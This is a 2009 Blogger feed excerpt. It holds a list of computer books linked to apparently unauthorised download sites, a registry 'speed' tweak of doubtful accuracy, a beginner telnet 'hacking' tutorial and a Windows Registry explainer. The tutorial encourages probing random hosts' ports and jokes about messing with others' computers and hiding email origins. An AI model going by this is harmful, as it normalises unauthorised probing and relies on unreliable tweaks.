/&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;156&lt;br /&gt;Perl 5 unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;157&lt;br /&gt;Perl 5.0 CGI web pages&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;158&lt;br /&gt;Perl cookbook&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;159&lt;br /&gt;Perl for system administration&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;160&lt;br /&gt;Perl in a nutshell&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;161&lt;br /&gt;Perl quick reference&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;162&lt;br /&gt;Peter norton's complete guide to windows NT 4 workstations&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;163&lt;br /&gt;Presenting activex&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;164&lt;br /&gt;Presenting activex&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;165&lt;br /&gt;Presenting javabeans&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;166&lt;br /&gt;Presenting javabeans&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;167&lt;br /&gt;Programming perl&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;168&lt;br /&gt;Programming perl, 3rd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;169&lt;br /&gt;Programming the Perl DBI&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;170&lt;br /&gt;Red hat linux unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;171&lt;br /&gt;Running a perfect intranet&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;172&lt;br /&gt;Running Linux, 3rd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;173&lt;br /&gt;Sams teach yourself java 1.1 in 24 hours/&lt;br /&gt;http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_1.1_Programming_in_24_Hours&lt;br /&gt;&lt;br /&gt;174&lt;br /&gt;Sams Teach yourself java in 21 days/Lemay, Laura&lt;br /&gt;http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Java_in_21_Days/&lt;br /&gt;&lt;br /&gt;175&lt;br /&gt;Sams teach yourself linux in 24 hours/Ball, Bill&lt;br /&gt;http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Linux_in_24%20Hours/&lt;br /&gt;&lt;br /&gt;176&lt;br /&gt;Sams teach yourself shell programming in 24 hours&lt;br /&gt;http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_Shell_Programming_in_24_Hours/&lt;br /&gt;&lt;br /&gt;177&lt;br /&gt;Sams teach yourself TCP/IP in 14 days&lt;br /&gt;http://book.onairweb.net/computer/sams/Sams_Teach_Yourself_TCP-IP_in_14_Days(SE)/&lt;br /&gt;&lt;br /&gt;178&lt;br /&gt;Sed and awk&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;179&lt;br /&gt;Sendmail&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;180&lt;br /&gt;Sendmail desktop reference&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;181&lt;br /&gt;Slackware linux unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;182&lt;br /&gt;Special edition using java, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;183&lt;br /&gt;Special edition using _javascript&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;184&lt;br /&gt;Special edition using _javascript&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;185&lt;br /&gt;Special edition using _Jscript&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;186&lt;br /&gt;Special edition using lotus notes and domino 4.5&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;187&lt;br /&gt;Special edition using Microsoft SQL server 6.5, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;188&lt;br /&gt;Special edition using Microsoft visual Interdev&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;189&lt;br /&gt;Special edition using perl 5 for web programming&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;190&lt;br /&gt;Special edition using perl for web programming&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;191&lt;br /&gt;Special edition using Visual Basic 4&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;192&lt;br /&gt;TCP/IP&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;193&lt;br /&gt;Teach yourself activex programming in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;194&lt;br /&gt;Teach yourself C++ in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;195&lt;br /&gt;Teach yourself C++ in 21 days&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;196&lt;br /&gt;Teach yourself CGI programming with Perl 5 in a week&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;197&lt;br /&gt;Teach yourself database programming with VB5 in 21 days, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;198&lt;br /&gt;Teach yourself database programming with visual basic 5 in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;199&lt;br /&gt;Teach yourself HTML 3.2 in 24 hours&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;200&lt;br /&gt;Teach yourself HTML 3.2 in 24 hours&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;201&lt;br /&gt;Teach yourself internet game programming with java in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;202&lt;br /&gt;Teach yourself java 1.1 programming in 24 hours&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;203&lt;br /&gt;Teach yourself jave in café in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.tm&lt;br /&gt;&lt;br /&gt;204&lt;br /&gt;Teach yourself Microsoft visual Interdev in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;205&lt;br /&gt;Teach yourself Microsoft visual Interdev in 21 days&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;206&lt;br /&gt;Teach yourself oracle 8 in 21 days&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;207&lt;br /&gt;Teach yourself perl 5 in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;208&lt;br /&gt;Teach yourself perl 5 in 21 days, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;209&lt;br /&gt;Teach yourself SQL in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;210&lt;br /&gt;Teach yourself SQL in 21 days, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;211&lt;br /&gt;Teach yourself TCP/IP in 14 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;212&lt;br /&gt;Teach yourself TCP/IP in 14 days, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;213&lt;br /&gt;Teach yourself the Internet in 24 hours&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;214&lt;br /&gt;Teach yourself the internet in 24 hours&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;215&lt;br /&gt;Teach yourself _VBScript in 21 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;216&lt;br /&gt;Teach yourself _VBScript in 21 days&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;217&lt;br /&gt;Teach yourself visual basic 5 in 24 hours&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;218&lt;br /&gt;Teach yourself Visual Basic 5 in 24 hours&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;219&lt;br /&gt;Teach yourself Visual J++ in 21 days&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;220&lt;br /&gt;Teach yourself web publishing with HTML 3.2 in 14 days&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;221&lt;br /&gt;Teach yourself web publishing with HTML in 14 days&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;222&lt;br /&gt;Thinking in C++&lt;br /&gt;http://www.mindview.net/Books&lt;br /&gt;&lt;br /&gt;223&lt;br /&gt;Thinking in C++/Eckel, Bruce - Vol.I, 2nd.ed.&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;224&lt;br /&gt;Thinking in C++/Eckel, Bruce - Vol.II, 2nd.ed.&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;225&lt;br /&gt;Thinking in Enterprise Java&lt;br /&gt;http://www.mindview.net/Books&lt;br /&gt;&lt;br /&gt;226&lt;br /&gt;Thinking in Java, 2nd.ed.&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;227&lt;br /&gt;Thinking in Java, 3rd.ed. (pdf)&lt;br /&gt;http://www.mindview.net/Books&lt;br /&gt;&lt;br /&gt;228&lt;br /&gt;Tricks of the internet gurus&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;229&lt;br /&gt;Tricks of the java programming gurus&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;230&lt;br /&gt;Unix and internet security&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;231&lt;br /&gt;Unix hints and hacks/Waingrow, Kirk&lt;br /&gt;http://book.onairweb.net/computer/os/unix/Administration/UNIX_Hints_&amp;_Hacks/19270001..htm&lt;br /&gt;&lt;br /&gt;232&lt;br /&gt;Unix in a nutshell&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;233&lt;br /&gt;Unix kornshell quick reference&lt;br /&gt;http://book.onairweb.net/computer/os/shell/Unix_KornShell_Quick_Reference/kornShell.html&lt;br /&gt;&lt;br /&gt;234&lt;br /&gt;Unix power tools&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;235&lt;br /&gt;Unix shell guide&lt;br /&gt;http://book.onairweb.net/computer/os/shell/The_UNIX_Shell_Guide/&lt;br /&gt;&lt;br /&gt;236&lt;br /&gt;Unix unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;237&lt;br /&gt;Unix unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;238&lt;br /&gt;Unix unleashed Internet Ed./Burk, Robin&lt;br /&gt;http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed(Internet_Edition)/fm.htm&lt;br /&gt;&lt;br /&gt;239&lt;br /&gt;Unix unleashed, System administrator's Edition&lt;br /&gt;http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed_System_Administrator's_Edition/toc.htm&lt;br /&gt;&lt;br /&gt;240&lt;br /&gt;Unix Unleashed/Sams Publication&lt;br /&gt;http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed/&lt;br /&gt;&lt;br /&gt;241&lt;br /&gt;Upgrading PCs illustrated&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;242&lt;br /&gt;Using windows NT workstation 4.0&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;243&lt;br /&gt;_VBScript unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;244&lt;br /&gt;_Vbscript unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;245&lt;br /&gt;Visual basic 4 in 12 easy lessons&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;246&lt;br /&gt;Visual basic 4 unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;247&lt;br /&gt;Visual Basic 5 night school&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;248&lt;br /&gt;Visual basic programming in 12 easy lessons&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;249&lt;br /&gt;Visual Basic programming in 12 easy lessons&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;250&lt;br /&gt;Visual C++ 4 unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;251&lt;br /&gt;Visual C++ programming in 12 easy lessons&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;252&lt;br /&gt;Web database developer's guide with visual basic 5&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;253&lt;br /&gt;Web database developer's guide with visual basic 5&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;254&lt;br /&gt;Web programming desktop reference 6-in-1&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm</description><link>http://zts-zts.blogspot.com/2009/09/200tech-books.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-5105378067323797022</guid><pubDate>Sat, 26 Sep 2009 07:47:00 +0000</pubDate><atom:updated>2009-09-26T00:47:26.586-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Web Info</category><title>How To optimize DSL-CABLE connection speed</title><description>First, u need to goto Start, then run. Type in regedit in the box. Next, goto the folder HKEY_LOCAL_MACHINE\System\CurrentControlSet\VxD\MSTCP&lt;br /&gt;Now, find the string DefaultRcvWindow . Now, edit the number to 64240 then restart your computer. There you go. High speed cable modem now with out dloading a program. Original value is 373360</description><link>http://zts-zts.blogspot.com/2009/09/how-to-optimize-dsl-cable-connection.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-6659466775939920103</guid><pubDate>Sat, 26 Sep 2009 07:41:00 +0000</pubDate><atom:updated>2009-09-26T00:42:55.246-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Hacking on xp part-2</title><description>How to Telnet with Windows XP&lt;br /&gt;The queen of hacker commands is telnet. To get Windows help for&lt;br /&gt;telnet, in the cmd.exe window give the command:&lt;br /&gt;C:\&gt;telnet /?&lt;br /&gt;Here's what you will get:&lt;br /&gt;telnet [-a][-e escape char][-f log file][-l user][-t term][host&lt;br /&gt;[port]]&lt;br /&gt;-a Attempt automatic logon. Same as -l option except uses&lt;br /&gt;the currently logged on user's name.&lt;br /&gt;-e Escape character to enter telnet client prompt.&lt;br /&gt;-f File name for client side logging&lt;br /&gt;-l Specifies the user name to log in with on the remote system.&lt;br /&gt;Requires that the remote system support the TELNET ENVIRON&lt;br /&gt;option.&lt;br /&gt;-t Specifies terminal type.&lt;br /&gt;Supported term types are vt100, vt52, ansi and vtnt only.&lt;br /&gt;host Specifies the hostname or IP address of the remote computer&lt;br /&gt;to connect to.&lt;br /&gt;port Specifies a port number or service name.&lt;br /&gt;****************&lt;br /&gt;Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn?t block it.&lt;br /&gt;****************&lt;br /&gt;****************&lt;br /&gt;Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name. &lt;br /&gt;****************&lt;br /&gt;The simplest use of telnet is to log into a remote computer. Give the&lt;br /&gt;command:&lt;br /&gt;C:/&gt;telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)&lt;br /&gt;If this computer is set up to let people log into accounts, you may&lt;br /&gt;get the message:&lt;br /&gt;login:&lt;br /&gt;Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.&lt;br /&gt;****************&lt;br /&gt;Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.&lt;br /&gt;****************&lt;br /&gt;Then comes the message:&lt;br /&gt;Password:&lt;br /&gt;Again, be exact in typing in your password.&lt;br /&gt;What if this doesn't work?&lt;br /&gt;Every day people write to me complaining they can't telnet. That is&lt;br /&gt;usually because they try to telnet into a computer, or a port on a&lt;br /&gt;computer that is set up to refuse telnet connections. Here's what it&lt;br /&gt;might look like when a computer refuses a telnet connection:&lt;br /&gt;C:\ &gt;telnet 10.0.0.3&lt;br /&gt;Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.&lt;br /&gt;Or you might see:&lt;br /&gt;C:\ &gt;telnet techbroker.com&lt;br /&gt;Connecting To techbroker.com...Could not open connection to the host, on port 23.&lt;br /&gt;No connection could be made because the target machine actively&lt;br /&gt;refused it.&lt;br /&gt;If you just give the telnet command without giving a port number, it&lt;br /&gt;will automatically try to connect on port 23, which sometimes runs a&lt;br /&gt;telnet server.&lt;br /&gt;**************&lt;br /&gt;Newbie note: your Windows computer has a telnet client program,&lt;br /&gt;meaning it will let you telnet out of it. However you have to install&lt;br /&gt;a telnet server before anyone can telnet into port 23 on your&lt;br /&gt;computer.&lt;br /&gt;*************&lt;br /&gt;If telnet failed to connect, possibly the computer you were trying to&lt;br /&gt;telnet into was down or just plain no longer in existence. Maybe the&lt;br /&gt;people who run that computer don't want you to telnet into it.&lt;br /&gt;How to Telnet into a Shell Account&lt;br /&gt;Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:&lt;br /&gt;C:/telnet freeshell.org 22&lt;br /&gt;SSH-1.99-OpenSSH_3.4p1&lt;br /&gt;That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at&lt;br /&gt;&lt;http://freeshell.org/&gt; . You can get a free SSH client program from&lt;br /&gt;&lt;http://winfiles.com/&gt; .&lt;br /&gt;One reason most hackers have shell accounts on Internet servers is because you can meet the real hackers there. When you've logged in, give the command w or who. That gives a list of user names. You can talk to other users with tht talk command. Another fun thing, if your shell account allows it, is to give the command&lt;br /&gt;ps -auxww&lt;br /&gt;It might tell you what commands and processes other users are running. Ask other users what they are doing and they might teach you something. Just be careful not to be a pest!&lt;br /&gt;***************&lt;br /&gt;You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.&lt;br /&gt;*************&lt;br /&gt;Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.&lt;br /&gt;If I try to telnet to this email program from outside this computer,&lt;br /&gt;here's what happens:&lt;br /&gt;C:\&gt;telnet 10.0.0.3 25&lt;br /&gt;Connecting To 10.0.0.3...Could not open connection to the host, on&lt;br /&gt;port 25.&lt;br /&gt;No connection could be made because the target machine actively&lt;br /&gt;refused it.&lt;br /&gt;However, if I log into an account on 10.0.0.3 and then telnet from&lt;br /&gt;inside to port 25, here's what I get:&lt;br /&gt;Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1&lt;br /&gt;Have a lot of fun...&lt;br /&gt;cmeinel@test-box:~&gt; telnet localhost 25&lt;br /&gt;Trying ::1...&lt;br /&gt;telnet: connect to address ::1: Connection refused&lt;br /&gt;Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical&lt;br /&gt;address meaning localhost, the same computer you are logged into]&lt;br /&gt;Connected to localhost.&lt;br /&gt;Escape character is '^]'.&lt;br /&gt;220 test-box.local ESMTP Postfix&lt;br /&gt;The reason I keep this port 25 hidden behind a firewall is to keep&lt;br /&gt;people from using it to try to break in or to forge email. Now the&lt;br /&gt;ubergeniuses reading this will start to make fun of me because no&lt;br /&gt;Internet address that begins with 10. is reachable from the Internet.&lt;br /&gt;However, sometimes I place this "test-box" computer online with a&lt;br /&gt;static Internet address, meaning whenever it is on the Internet, it&lt;br /&gt;always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.&lt;br /&gt;***************&lt;br /&gt;Newbie note: What is all this about headers? It's stuff at the&lt;br /&gt;beginning of an email that may - or may not - tell you a lot about&lt;br /&gt;where it came from and when. To see full headers, in Outlook click&lt;br /&gt;view -&gt; full headers. In Eudora, click the "Blah blah blah" icon.&lt;br /&gt;****************</description><link>http://zts-zts.blogspot.com/2009/09/hacking-on-xp-part-2.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-9093470373936959881</guid><pubDate>Mon, 10 Aug 2009 17:12:00 +0000</pubDate><atom:updated>2009-08-10T10:13:05.347-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Xp-Tricks</category><title>Registry</title><description>What is the Registry?&lt;br /&gt;The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.&lt;br /&gt;&lt;br /&gt;The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 &amp; 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).&lt;br /&gt;&lt;br /&gt;The Structure of The Registry&lt;br /&gt;The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.&lt;br /&gt;&lt;br /&gt;Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.&lt;br /&gt;&lt;br /&gt;There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.&lt;br /&gt;* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.&lt;br /&gt;* HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.&lt;br /&gt;* HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.&lt;br /&gt;* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.&lt;br /&gt;* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&amp;-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Each registry value is stored as one of five main data types:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.&lt;br /&gt;* REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.&lt;br /&gt;* REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)&lt;br /&gt;* REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)&lt;br /&gt;* REG_SZ - This type is a standard string, used to represent human readable text values.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Other data types not available through the standard registry editors include:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.&lt;br /&gt;* REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.&lt;br /&gt;* REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.&lt;br /&gt;* REG_NONE - No defined value type.&lt;br /&gt;* REG_QWORD - A 64-bit number.&lt;br /&gt;* REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.&lt;br /&gt;* REG_RESOURCE_LIST - A device-driver resource list.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Editing The Registry&lt;br /&gt;&lt;br /&gt;The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below.&lt;br /&gt;&lt;br /&gt;An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ &amp; REG_MULTI_SZ.&lt;br /&gt;&lt;br /&gt;Create a Shortcut to Regedit&lt;br /&gt;This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.&lt;br /&gt;&lt;br /&gt;Using Regedit to modify your Registry&lt;br /&gt;Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.&lt;br /&gt;&lt;br /&gt;Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by 